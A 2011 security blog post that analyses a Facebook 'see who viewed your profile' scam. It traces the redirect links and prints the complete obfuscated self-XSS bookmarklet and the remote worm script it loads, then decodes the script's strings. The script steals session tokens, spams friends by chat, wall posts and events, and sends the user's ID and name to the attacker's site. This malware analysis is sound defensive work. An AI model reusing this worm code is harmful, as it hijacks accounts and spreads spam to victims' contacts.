Facebook Spam

I could see lots of people publishing this content on my wall, so felt to give it a shot to analyze. The link that is spreading a lot is www.stump.ws/rdgct7s. After analyzing this link, in a non-Facebook session, here is what it resolves to – www.1119999977u7.info. This page further redirects to www.2220000099×9.info. This page looks like the following,

facebook_spam

The content on the page says to copy a java-script as Step 1. Just Click In the Box to Highlight All Then Press Ctrl+C. Here is the mentioned java-script,

 javascript: var _0xb533=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x2F\x2F\x32\x32\x32\x30\x30\x30\x30\x30\x39\x39\x78\x39\x2E\x69\x6E\x66\x6F\x2F\x65\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0xb533[2]](_0xb533[1]))[_0xb533[0]]=_0xb533[3];b[_0xb533[5]][_0xb533[4]](a); void (0);

The above mentioned script decodes to pointing to a URL: 2220000099×9.info/e.js.This URL contains a Java-script file with a huge load of hex characters and variables as shown here,

 var _0x4f0b=["\x48\x65\x79\x20\x25\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x25\x20\x20\x49\x20\x6A\x75\x73\x74\x20\x66\x6F\x75\x6E\x64\x20\x6F\x75\x74\x20\x79\x6F\x75\x20\x77\x65\x72\x65\x20\x6F\x6E\x65\x20\x6F\x66\x20\x6D\x79\x20\x74\x6F\x70\x20\x73\x74\x61\x6C\x6B\x65\x72\x73\x2C\x20\x79\x6F\x75\x20\x63\x61\x6E\x20\x66\x69\x6E\x64\x20\x79\x6F\x75\x72\x73\x20\x61\x74\x20\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x67\x72\x64\x35\x6B\x61","\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x0A\x77\x74\x66\x20\x67\x75\x79\x73\x2C\x20\x79\x6F\x75\x20\x61\x70\x70\x65\x61\x72\x65\x64\x20\x61\x73\x20\x74\x68\x65\x20\x70\x65\x6F\x70\x6C\x65\x20\x77\x68\x6F\x20\x73\x74\x61\x6C\x6B\x65\x64\x20\x6D\x65\x20\x74\x68\x65\x20\x6D\x6F\x73\x74\x2C\x20\x79\x6F\x75\x20\x63\x61\x6E\x20\x73\x65\x65\x20\x79\x6F\x75\x72\x73\x20\x61\x74\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x67\x72\x64\x35\x6B\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x32\x32\x32\x30\x30\x30\x30\x30\x39\x39\x78\x39\x2E\x69\x6E\x66\x6F\x2F\x65\x6E\x64\x2E\x70\x68\x70","\x79\x6F\x20\x2C\x20\x49\x20\x6C\x65\x61\x72\x6E\x65\x64\x20\x61\x20\x77\x61\x79\x20\x74\x6F\x20\x76\x69\x65\x77\x20\x77\x68\x6F\x20\x76\x69\x65\x77\x73\x20\x79\x6F\x75\x72\x20\x70\x72\x6F\x66\x69\x6C\x65\x0A\x0A\x46\x6F\x6C\x6C\x6F\x77\x20\x74\x68\x65\x73\x65\x20\x65\x61\x73\x79\x20\x73\x74\x65\x70\x73\x20\x74\x6F\x20\x66\x69\x6E\x64\x20\x6F\x75\x74\x3A\x0A\x0A\x61\x6C\x6C\x20\x79\x6F\x75\x20\x68\x61\x76\x65\x20\x74\x6F\x20\x64\x6F\x20\x69\x73\x20\x67\x6F\x20\x74\x6F\x20\x74\x68\x69\x73\x20\x6C\x69\x6E\x6B\x20\x61\x6E\x64\x20\x66\x6F\x6C\x6C\x6F\x77\x20\x74\x68\x65\x20\x64\x69\x72\x65\x63\x74\x69\x6F\x6E\x73\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x67\x72\x64\x35\x6B\x61","\x53\x65\x65\x20\x57\x68\x6F\x20\x48\x61\x73\x20\x56\x69\x65\x77\x65\x64\x20\x59\x6F\x75\x72\x20\x50\x72\x6F\x66\x69\x6C\x65\x21","\x59\x6F\x75\x20\x73\x68\x6F\x75\x6C\x64\x20\x72\x65\x61\x6C\x6C\x79\x20\x63\x68\x65\x63\x6B\x20\x74\x68\x69\x73\x20\x6F\x75\x74\x2E\x20\x49\x74\x20\x72\x65\x61\x6C\x6C\x79\x20\x77\x6F\x72\x6B\x73\x21","\x54\x68\x69\x73\x20\x69\x73\x20\x74\x68\x65\x20\x6E\x65\x77\x20\x63\x6F\x64\x65\x20\x74\x68\x61\x74\x20\x65\x76\x65\x72\x79\x6F\x6E\x65\x20\x68\x61\x73\x20\x62\x65\x65\x6E\x20\x74\x61\x6C\x6B\x69\x6E\x67\x20\x61\x62\x6F\x75\x74\x21","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x6F\x70","\x47\x45\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x73\x65\x6E\x64","\x2F","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x40\x5B","\x69\x64","\x3A","\x6E\x61\x6D\x65","\x5D","","\x26","\x3D","\x50\x4F\x53\x54","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x62\x6C\x6F\x63\x6B","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x61\x62\x73\x6F\x6C\x75\x74\x65","\x77\x69\x64\x74\x68","\x25","\x68\x65\x69\x67\x68\x74","\x6C\x65\x66\x74","\x70\x78","\x74\x65\x78\x74\x41\x6C\x69\x67\x6E","\x63\x65\x6E\x74\x65\x72","\x70\x61\x64\x64\x69\x6E\x67","\x34\x70\x78","\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64","\x23\x46\x46\x46\x46\x46\x46","\x7A\x49\x6E\x64\x65\x78","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x26\x6E\x62\x73\x70\x3B\x3C\x62\x72\x2F\x3E\x50\x6C\x65\x61\x73\x65\x20\x77\x61\x69\x74\x2C\x20\x74\x68\x69\x73\x20\x63\x61\x6E\x20\x74\x61\x6B\x65\x20\x61\x20\x6C\x69\x74\x74\x6C\x65\x20\x77\x68\x69\x6C\x65\x2E\x2E\x2E\x3C\x62\x72\x2F\x3E\x3C\x62\x72\x2F\x3E\x4F\x72\x20\x69\x66\x20\x79\x6F\x75\x20\x67\x65\x74\x20\x73\x69\x63\x6B\x20\x6F\x66\x20\x77\x61\x69\x74\x69\x6E\x67\x2C\x20\x79\x6F\x75\x20\x63\x61\x6E\x20\x3C\x61\x20\x68\x72\x65\x66\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x76\x6F\x69\x64\x28\x30\x29\x3B\x22\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x77\x66\x3D\x30\x3B\x20\x6D\x66\x28\x29\x3B\x22\x3E\x63\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E\x20\x28\x72\x65\x73\x75\x6C\x74\x73\x20\x6D\x61\x79\x20\x62\x65\x20\x6C\x65\x73\x73\x20\x61\x63\x63\x75\x72\x61\x74\x65\x29","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x64\x61\x74\x61","\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64","\x6E\x61\x76\x41\x63\x63\x6F\x75\x6E\x74\x4E\x61\x6D\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3F","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x6F\x6F\x73\x65\x2F\x3F\x5F\x5F\x61\x3D\x31","\x65\x76\x65\x6E\x74","\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31\x26\x76\x69\x65\x77\x65\x72\x3D","\x26\x74\x6F\x6B\x65\x6E\x3D","\x26\x66\x69\x6C\x74\x65\x72\x5B\x30\x5D\x3D\x75\x73\x65\x72\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x30\x5D\x3D\x66\x72\x69\x65\x6E\x64\x73\x5F\x6F\x6E\x6C\x79\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x31\x5D\x3D\x6E\x6D\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x32\x5D\x3D\x73\x6F\x72\x74\x5F\x61\x6C\x70\x68\x61","\x6C\x65\x6E\x67\x74\x68","\x70\x75\x73\x68","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x67\x65\x74\x4D\x6F\x6E\x74\x68","\x67\x65\x74\x44\x61\x74\x65","\x67\x65\x74\x46\x75\x6C\x6C\x59\x65\x61\x72","\x67\x65\x74\x48\x6F\x75\x72\x73","\x2C","\x6A\x6F\x69\x6E","\x6F\x6E","\x43\x72\x65\x61\x74\x65\x20\x45\x76\x65\x6E\x74","\x6E\x65\x77","\x2F\x65\x76\x65\x6E\x74\x73\x2F\x63\x72\x65\x61\x74\x65\x2E\x70\x68\x70","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x73\x75\x62\x73\x74\x72","\x28","\x29","\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74","\x70\x61\x79\x6C\x6F\x61\x64","\x6E\x6F\x77\x41\x76\x61\x69\x6C\x61\x62\x6C\x65\x4C\x69\x73\x74","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x25\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x25","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x66\x69\x72\x73\x74\x4E\x61\x6D\x65","\x75\x73\x65\x72\x49\x6E\x66\x6F\x73","\x72\x65\x70\x6C\x61\x63\x65","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x73\x65\x6E\x64\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x2F\x61\x6A\x61\x78\x2F\x62\x72\x6F\x77\x73\x65\x72\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x3F\x75\x69\x64\x3D","\x26\x66\x69\x6C\x74\x65\x72\x3D\x61\x6C\x6C\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x3D\x31","\x73\x68\x69\x66\x74","\x66\x65\x74\x63\x68\x65\x64\x20\x66\x72\x69\x65\x6E\x64\x73\x3A\x20","\x68\x6F\x6D\x65","\x70\x6F\x70","\x25\x74\x66\x25","\x73\x65\x61\x72\x63\x68","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65\x5F\x74\x65\x78\x74","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65","\x6D\x65\x73\x73\x61\x67\x65\x20\x74\x65\x78\x74\x3A\x20","\x2F\x61\x6A\x61\x78\x2F\x75\x70\x64\x61\x74\x65\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x72\x6F\x66\x69\x6C\x65"];var chatmessage=_0x4f0b[0];var postmessage=_0x4f0b[1];var redirect=_0x4f0b[2];var eventdesc=_0x4f0b[3];var eventname=_0x4f0b[4];var nfriends=5000;var eventmsg=_0x4f0b[5];var eventpmsubj=_0x4f0b[6];var _0xe26a=[_0x4f0b[7],_0x4f0b[8],_0x4f0b[9],_0x4f0b[10],_0x4f0b[11],_0x4f0b[12],_0x4f0b[13],_0x4f0b[14],_0x4f0b[15],_0x4f0b[16],_0x4f0b[17],_0x4f0b[18],_0x4f0b[19],_0x4f0b[20],_0x4f0b[21],_0x4f0b[22],_0x4f0b[23],_0x4f0b[24],_0x4f0b[25],_0x4f0b[26],_0x4f0b[27],_0x4f0b[28],_0x4f0b[29],_0x4f0b[30],_0x4f0b[31],_0x4f0b[32],_0x4f0b[33],_0x4f0b[34],_0x4f0b[35],_0x4f0b[36],_0x4f0b[37],_0x4f0b[38],_0x4f0b[39],_0x4f0b[40],_0x4f0b[41],_0x4f0b[42],_0x4f0b[43],_0x4f0b[44],_0x4f0b[45],_0x4f0b[46],_0x4f0b[47],_0x4f0b[48],_0x4f0b[49],_0x4f0b[50],_0x4f0b[51],_0x4f0b[52],_0x4f0b[53],_0x4f0b[54],_0x4f0b[55],_0x4f0b[56],_0x4f0b[57],_0x4f0b[58],_0x4f0b[59],_0x4f0b[60],_0x4f0b[61],_0x4f0b[62],_0x4f0b[63],_0x4f0b[64],_0x4f0b[65],_0x4f0b[66],_0x4f0b[67],_0x4f0b[68],_0x4f0b[69],_0x4f0b[70],_0x4f0b[71],_0x4f0b[72],_0x4f0b[73],_0x4f0b[74],_0x4f0b[75],_0x4f0b[76],_0x4f0b[77],_0x4f0b[78],_0x4f0b[79],_0x4f0b[80],_0x4f0b[81],_0x4f0b[82],_0x4f0b[83],_0x4f0b[84],_0x4f0b[85],_0x4f0b[86],_0x4f0b[87],_0x4f0b[88],_0x4f0b[89],_0x4f0b[90],_0x4f0b[91],_0x4f0b[92],_0x4f0b[93],_0x4f0b[94],_0x4f0b[95],_0x4f0b[96],_0x4f0b[97],_0x4f0b[98],_0x4f0b[99],_0x4f0b[100],_0x4f0b[101],_0x4f0b[102],_0x4f0b[103],_0x4f0b[104],_0x4f0b[105],_0x4f0b[106],_0x4f0b[107]];var debug=false;var wf=0;var mf=function (){if(wf<=0){setTimeout(function (){window[_0xe26a[2]][_0xe26a[1]][_0xe26a[0]]=redirect;} ,500);} ;} ;var doget=function (_0x43aaxe,_0x43aaxf,_0x43aax10){var _0x43aax11= new XMLHttpRequest();_0x43aax11[_0xe26a[4]](_0xe26a[3],_0x43aaxe);_0x43aax11[_0xe26a[5]]=function (){if(_0x43aax11[_0xe26a[6]]==4){if(_0x43aax11[_0xe26a[7]]==200&&_0x43aaxf){_0x43aaxf(_0x43aax11[_0xe26a[8]]);} ;if(_0x43aax10){_0x43aax10();} ;} ;} ;_0x43aax11[_0xe26a[9]]();} ;doget(_0xe26a[10],function (_0x43aax12){var _0x43aax13=document[_0xe26a[12]][_0xe26a[11]](/c_user=(\d+)/)[1];var _0x43aax14=function (_0x43aax15){return _0x43aax15?_0xe26a[13]+_0x43aax15[_0xe26a[14]]+_0xe26a[15]+_0x43aax15[_0xe26a[16]]+_0xe26a[17]:_0xe26a[18];} ;var _0x43aax16=function (_0x43aax15){return _0x43aax15?_0x43aax15[_0xe26a[16]]:_0xe26a[18];} ;var _0x43aax17=function (_0x43aax15){out=_0xe26a[18];for(var _0x43aax18 in _0x43aax15){out+=(out?_0xe26a[19]:_0xe26a[18])+_0x43aax18+((_0x43aax15[_0x43aax18]!==null)?_0xe26a[20]+encodeURIComponent(_0x43aax15[_0x43aax18]):_0xe26a[18]);} ;return out;} ;var _0x43aax19=function (_0x43aaxe,_0x43aax15,_0x43aaxf,_0x43aax10){var _0x43aax11= new XMLHttpRequest();_0x43aax11[_0xe26a[4]](_0xe26a[21],_0x43aaxe);_0x43aax11[_0xe26a[24]](_0xe26a[22],_0xe26a[23]);_0x43aax11[_0xe26a[5]]=function (){if(_0x43aax11[_0xe26a[6]]==4){if(_0x43aax11[_0xe26a[7]]==200&&_0x43aaxf){_0x43aaxf(_0x43aax11[_0xe26a[8]]);} ;if(_0x43aax10){_0x43aax10();} ;} ;} ;_0x43aax11[_0xe26a[9]](_0x43aax17(_0x43aax15));} ;var _0x43aax1a=function (){var _0x43aax1b=document[_0xe26a[26]](_0xe26a[25]);_0x43aax1b[_0xe26a[28]][_0xe26a[27]]=_0xe26a[29];_0x43aax1b[_0xe26a[28]][_0xe26a[30]]=_0xe26a[31];_0x43aax1b[_0xe26a[28]][_0xe26a[32]]=100+_0xe26a[33];_0x43aax1b[_0xe26a[28]][_0xe26a[34]]=100+_0xe26a[33];_0x43aax1b[_0xe26a[28]][_0xe26a[35]]=0+_0xe26a[36];_0x43aax1b[_0xe26a[28]][_0xe26a[2]]=0+_0xe26a[36];_0x43aax1b[_0xe26a[28]][_0xe26a[37]]=_0xe26a[38];_0x43aax1b[_0xe26a[28]][_0xe26a[39]]=_0xe26a[40];_0x43aax1b[_0xe26a[28]][_0xe26a[41]]=_0xe26a[42];_0x43aax1b[_0xe26a[28]][_0xe26a[43]]=999999;_0x43aax1b[_0xe26a[44]]=_0xe26a[45];document[_0xe26a[47]][_0xe26a[46]](_0x43aax1b);} ;var _0x43aax1c=_0x43aax12[_0xe26a[11]](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i)[1];var _0x43aax1d=_0x43aax12[_0xe26a[11]](/name="post_form_id" value="([\d\w]+)"/i)[1];var _0x43aax1e=_0x43aax12[_0xe26a[11]](/name="fb_dtsg" value="([\d\w]+)"/i)[1];var _0x43aax1f=document[_0xe26a[51]](_0xe26a[50])[_0xe26a[49]][_0xe26a[48]];redirect=redirect+_0xe26a[52]+_0x43aax17({userid:_0x43aax13,name:_0x43aax1f,doclose:1});_0x43aax1a();if(eventdesc){wf++;_0x43aax19(_0xe26a[53],{type:_0xe26a[54],eid:null,invite_message:_0xe26a[18],__d:1,post_form_id:_0x43aax1d,fb_dtsg:_0x43aax1e,lsd:null,post_form_id_source:_0xe26a[55]},function (_0x43aax20){var _0x43aax21=_0x43aax20[_0xe26a[11]](/\\"token\\":\\"([^\\]+)\\"/)[1];var _0x43aaxe=_0xe26a[56]+_0x43aax13+_0xe26a[57]+_0x43aax21+_0xe26a[58];doget(_0x43aaxe,function (_0x43aax22){var _0x43aax23=_0x43aax22[_0xe26a[11]](/\{"uid":\d+,/g);var _0x43aax24=[];for(var _0x43aax25=0;_0x43aax25<_0x43aax23[_0xe26a[59]];_0x43aax25++){var _0x43aax26=_0x43aax23[_0x43aax25][_0xe26a[11]](/:(\d+),/)[1];if(_0x43aax26!=_0x43aax13){_0x43aax24[_0xe26a[60]](_0x43aax26);} ;} ;var _0x43aax27= new Date();_0x43aax27[_0xe26a[62]](_0x43aax27[_0xe26a[61]]()+60*60*24*1000);datestr=(_0x43aax27[_0xe26a[63]]()+1)+_0xe26a[10]+_0x43aax27[_0xe26a[64]]()+_0xe26a[10]+_0x43aax27[_0xe26a[65]]();timestr=_0x43aax27[_0xe26a[66]]()*60;var _0x43aax28={post_form_id:_0x43aax1d,fb_dtsg:_0x43aax1e,start_time_intl_field:datestr,start_time_text_field:datestr,start_time_hour_min:timestr,name:eventname,place_page_id:_0xe26a[18],location:_0xe26a[18],street:_0xe26a[18],geo_id:_0xe26a[18],geo_sq:_0xe26a[18],desc:eventdesc,sgb_invitees:_0x43aax24[_0xe26a[68]](_0xe26a[67]),sgb_emails:_0xe26a[18],sgb_message:_0xe26a[18],privacy_type:_0xe26a[69],guest_list:_0xe26a[69],connections_can_post:_0xe26a[69],save:_0xe26a[70],submitting:_0xe26a[18]};_0x43aax28[_0xe26a[71]]=_0xe26a[18];_0x43aax19(_0xe26a[72],_0x43aax28,false,function (){mf(--wf);} );} );} );} ;if(chatmessage){wf++;_0x43aax19(_0xe26a[73],{user:_0x43aax13,post_form_id:_0x43aax1d,fb_dtsg:_0x43aax1e,lsd:null,post_form_id_source:_0xe26a[55],popped_out:false,force_render:true},function (_0x43aax20){var _0x43aax29=_0x43aax20[_0xe26a[74]](9);var _0x43aax2a=eval(_0xe26a[75]+_0x43aax29+_0xe26a[76]);var _0x43aax2b=_0x43aax2a[_0xe26a[78]][_0xe26a[77]];for(var _0x43aax2c in _0x43aax2b[_0xe26a[79]]){var _0x43aax2d=Math[_0xe26a[81]](Math[_0xe26a[80]]()*1335448958);var _0x43aax2e=( new Date())[_0xe26a[61]]();var _0x43aax2f=chatmessage[_0xe26a[86]](_0xe26a[82],_0x43aax2b[_0xe26a[85]][_0x43aax2c][_0xe26a[84]][_0xe26a[83]]());_0x43aax19(_0xe26a[87],{msg_id:Math[_0xe26a[81]](Math[_0xe26a[80]]()*1335448958),client_time:( new Date())[_0xe26a[61]](),msg_text:chatmessage[_0xe26a[86]](_0xe26a[82],_0x43aax2b[_0xe26a[85]][_0x43aax2c][_0xe26a[84]][_0xe26a[83]]()),to:_0x43aax2c,post_form_id:_0x43aax1d,fb_dtsg:_0x43aax1e,post_form_id_source:_0xe26a[55]});} ;mf(--wf);} );} ;if(postmessage){wf++;doget(_0xe26a[88]+_0x43aax13+_0xe26a[89],function (_0x43aax20){var _0x43aax23=_0x43aax20[_0xe26a[11]](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);var _0x43aax30=[];for(var _0x43aax25=0;_0x43aax25<_0x43aax23[_0xe26a[59]];_0x43aax25++){var _0x43aax26=_0x43aax23[_0x43aax25][_0xe26a[11]](/_\d+_/)[0][_0xe26a[86]](/_/g,_0xe26a[18]);var _0x43aax31=_0x43aax23[_0x43aax25][_0xe26a[11]](/>[^>]+\\u003c\\\/a>$/i)[0][_0xe26a[86]](/\\u003c\\\/a>$/gim,_0xe26a[18])[_0xe26a[86]](/>/g,_0xe26a[18]);_0x43aax30[_0xe26a[60]]({id:_0x43aax26,name:_0x43aax31});} ;var _0x43aax10=[];var _0x43aax32=[];while(_0x43aax30[_0xe26a[59]]){var _0x43aax33=Math[_0xe26a[81]](Math[_0xe26a[80]]()*_0x43aax30[_0xe26a[59]]);_0x43aax10[_0xe26a[60]](_0x43aax30[_0x43aax33]);_0x43aax32[_0xe26a[60]](_0x43aax30[_0x43aax33]);var _0x43aax2e=_0x43aax30[_0xe26a[90]]();if(_0x43aax33){_0x43aax30[_0x43aax33-1]=_0x43aax2e;} ;} ;if(debug){alert(_0xe26a[91]+_0x43aax10[_0xe26a[59]]);} ;var _0x43aax34={post_form_id:_0x43aax1d,fb_dtsg:_0x43aax1e,xhpc_composerid:_0x43aax1c,xhpc_targetid:_0x43aax13,xhpc_context:_0xe26a[92],xhpc_fbx:_0xe26a[18],lsd:null,post_form_id_source:_0xe26a[55]};mt=postmessage;m=postmessage;while(mt[_0xe26a[95]](_0xe26a[94])>=0){var _0x43aax35=_0x43aax10[_0xe26a[93]]();mt=mt[_0xe26a[86]](_0xe26a[94],_0x43aax16(_0x43aax35));m=m[_0xe26a[86]](_0xe26a[94],_0x43aax14(_0x43aax35));} ;_0x43aax34[_0xe26a[96]]=mt;_0x43aax34[_0xe26a[97]]=m;if(debug){alert(_0xe26a[98]+mt);} ;_0x43aax19(_0xe26a[99],_0x43aax34);var _0x43aax36=function (_0x43aax18){if(_0x43aax18==0){wf=0;mf();return ;} ;var _0x43aax37=_0x43aax32[_0xe26a[90]]();var _0x43aax38={post_form_id:_0x43aax1d,fb_dtsg:_0x43aax1e,xhpc_composerid:_0x43aax1c,xhpc_targetid:_0x43aax37[_0xe26a[14]],xhpc_context:_0xe26a[100],xhpc_fbx:1,lsd:null,post_form_id_source:_0xe26a[55]};var _0x43aax39=postmessage;var _0x43aax3a=postmessage;if(_0x43aax10[_0xe26a[59]]==0){wf=0;mf();return ;} ;while(_0x43aax39[_0xe26a[95]](_0xe26a[94])>=0){var _0x43aax3b=_0x43aax10[_0xe26a[93]]();_0x43aax39=_0x43aax39[_0xe26a[86]](_0xe26a[94],_0x43aax16(_0x43aax3b));_0x43aax3a=_0x43aax3a[_0xe26a[86]](_0xe26a[94],_0x43aax14(_0x43aax3b));} ;_0x43aax38[_0xe26a[96]]=_0x43aax39;_0x43aax38[_0xe26a[97]]=_0x43aax3a;_0x43aax19(_0xe26a[99],_0x43aax38);setTimeout(function (){_0x43aax36(_0x43aax18-1);} ,2000);} ;wf++;setTimeout(function (){_0x43aax36(nfriends);} ,2000);} );} ;mf();} );

Initial hex characters are decoded to the following plain-text,

 "Hey %firstname%  I just found out you were one of my top stalkers, you can find yours at  http://stump.ws/grd5ka","%tf% %tf% %tf% %tf% %tf% %tf% wtf guys, you appeared as the people who stalked me the most, you can see yours at http://stump.ws/grd5ka","http://www.2220000099x9.info/end.php","yo , I learned a way to view who views your profile  Follow these easy steps to find out:  all you have to do is go to this link and follow the directions http://stump.ws/grd5ka","See Who Has Viewed Your Profile!","You should really check this out. It really works!","This is the new code that everyone has been talking about!","href","location","top","GET","open","onreadystatechange","readyState","status","responseText","send","/","match","cookie","@[","id",":","name","]","","&","=","POST","Content-Type","application/x-www-form-urlencoded","setRequestHeader","div","createElement","display","style","block","position","absolute","width","%","height","left","px","textAlign","center","padding","4px","background","#FFFFFF","zIndex","innerHTML","&nbsp;<br/>Please wait, this can take a little while...<br/><br/>Or if you get sick of waiting, you can <a href="javascript:void(0);" onclick="wf=0; mf();">click here</a> (results may be less accurate)","appendChild","body","data","firstChild","navAccountName","getElementById","?","/ajax/choose/?__a=1","event","AsyncRequest","/ajax/typeahead/first_degree.php?__a=1&viewer=","&token=","&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha","length","push","getTime","setTime","getMonth","getDate","getFullYear","getHours",",","join","on","Create Event","new","/events/create.php","/ajax/chat/buddy_list.php?__a=1","substr","(",")","buddy_list","payload","nowAvailableList","random","floor","%firstname%","toLowerCase","firstName","userInfos","replace","/ajax/chat/send.php?__a=1","/ajax/browser/friends/?uid=","&filter=all&__a=1&__d=1","shift","fetched friends: ","home","pop","%tf%","search","xhpc_message_text","xhpc_message","message text: ","/ajax/updatestatus.php?__a=1","profile"

This is the way it spreads to other users (code: /ajax/chat/buddy_list.php) as posting messages on their wall from your profile and update your status (code: /ajax/updatestatus.php?__a=1). It also creates an event (code:&options[2]=sort_alpha”,”length”,”push”,”getTime”,”setTime”,”getMonth”,”getDate”,”getFullYear”,”getHours”,”,”,”join”,”on”,”Create Event”,”new”,”/events/create.php)

Apr 19th, 2011 | Filed in: Security | 1 comment | Trackback

Author: Rishi Narang

« Penetration Testing PWN0 Scripts »

neo

Reply | Quote

May 24th, 2011 at 15:51 | #1

Great!

WTF.uzz

Facebook Spam

Leave a comment

Recent Posts

Categories

Tag Cloud

Archives

Link Pod